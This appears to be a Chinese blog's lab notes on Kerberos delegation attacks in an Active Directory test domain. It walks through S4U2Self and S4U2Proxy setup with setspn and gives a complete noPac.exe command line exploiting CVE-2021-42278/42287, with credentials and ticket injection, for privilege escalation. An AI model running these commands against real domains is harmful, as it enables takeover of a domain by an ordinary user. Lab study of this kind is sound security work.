当前位置: 首页 > news >正文

#S4U2SELF#S4U2Proxy#CVE-2021-42278/42287

#S4U2SELF

Win08创建普通用户 

s4u2 

@xwj456

可以看到普通用户是没用委托属性的 

Win08手动赋予委托服务属性

setspn -A wsw/wsw.com s4u2 

Win10身份验证

s4u2

@xwj456

AS请求 

两个勾

两个勾和include-pac记得按上(蓝色) ,发包之前把wireshark打开,方便记录和排查

TGS请求

上面四个勾+下面两个勾

#S4U2Proxy 

申请其他服务 

Win08添加

添加cifs

组策略管理 

注意这里是用户s4u2

成功添加

请求之前打开wireshark

AS请求(同上)

第一次TGS请求(同上)

第二次TGS请求 

include-pac按掉,S4U2SELF不要勾 

最后生成的那个票据重命名proxy,复制到工具里

#CVE-2021-42278/42287 

noPac.exe
noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb /mPassword @xwj123 /service cifs /ptt

(黄色部分每次都要改一改)

相关文章:

  • DeepWiki: Github的百科全书
  • MCP与GitHub的集成:开发者的“自动化流水线”革命
  • 什么是ERP?ERP有哪些功能?小微企业ERP系统源码,SpringBoot+Vue+ElementUI+UniAPP
  • 傲云源墅:以五傲价值重构北京主城别墅格局
  • 自动发电控制是一次调频还是二次调频?
  • Java面试终极篇:Sentinel+Seata+Kafka Streams高并发架构实战
  • Redis+Caffeine构造多级缓存
  • 数据库原理期末考试速成--最后附带两套题
  • 基于大模型的原发性醛固酮增多症全流程预测与诊疗方案研究
  • 硅基计划2.0 学习总结 壹 Java初阶
  • 在Mac环境下搭建Docker环境的全攻略
  • 红队视角下的域森林突破:一场由Shiro反序列化引发的跨域控攻防对抗
  • [Git]ssh下用Tortoisegit每次提交都要输密码
  • AnaTraf:深度解析网络性能分析(NPM)
  • 基于Qt6 + MuPDF在 Arm IMX6ULL运行的PDF浏览器——MuPDF Adapter文档
  • SMT贴片加工技术解析与应用要点
  • Linux 文件查看|查找|压缩|解压 常用命令
  • Github 2025-05-12 开源项目周报 Top15
  • Unity动画系统使用整理 --- Playable
  • 【后端】SpringBoot用CORS解决无法跨域访问的问题
  • 多家中小银行存款利率迈入“1时代”
  • 北京“准80后”干部兰天跨省份调任新疆生态环境厅副厅长
  • 青海规范旅游包车行为:不得引导外省籍旅游包车违规驻地运营
  • 干部任职公示:陕西宁强、镇安两县县长拟进一步使用
  • 三大股份制银行入局AIC,一级市场再迎“活水”
  • 苏东坡:人生就是哈哈哈哈哈